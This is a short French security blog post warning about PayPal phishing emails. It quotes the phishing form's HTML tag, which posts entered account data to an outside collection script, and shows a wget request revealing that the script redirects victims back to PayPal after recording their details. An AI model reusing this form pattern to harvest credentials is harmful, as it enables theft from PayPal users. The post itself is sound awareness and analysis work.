Un nouveau phishing qui vise les personnes qui ont un compte Paypal.

Le titre “Negative balance” laisse supposer que votre compte est débiteur et qu’il faut donc régulariser la situation. Dans le mail on trouve un formulaire :

En regardant le code source du formulaire on voit :

<FORM onsubmit="return validate(this)" method=post name=mucaie
      action=http:/studtrio.com/form.php>

Le javascript permet juste de vérifier que toutes les informations sont présentes.
Par contre on voit que les données renseignées dans le formulaire ne sont pas vraiment adressées à Paypal lorsque l’on clique sur le bouton “Agree and Submit”.

Si on fait une requete du l’URL: http:/studtrio.com/form.php, on voit que pour ne pas inquiéter les victimes, les instigateurs de ce phishing les renvoient sur Paypal après avoir enregistré les informations contenues dans le formulaire :

$ wget http://studtrio.com/form.php
--2011-10-02 08:05:02--  http://studtrio.com/form.php
Résolution de studtrio.com... 67.195.140.36
Connexion vers studtrio.com|67.195.140.36|:80... connecté.
requête HTTP transmise, en attente de la réponse... 302 Moved Temporarily
Emplacement: https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit&dispatch=5885d80a13c0db1fc53a056acd1538879f614231735d88db02692aa5ce177198 [suivant]

Une vague de phishing est en cours, elles concerne Paypal.

Le mail d’hameçonnage prétend être en rapport avec un litige en cours:

Le lien renvoi, après plusieurs redirections sur un site contrefait  imitant le site Paypal original: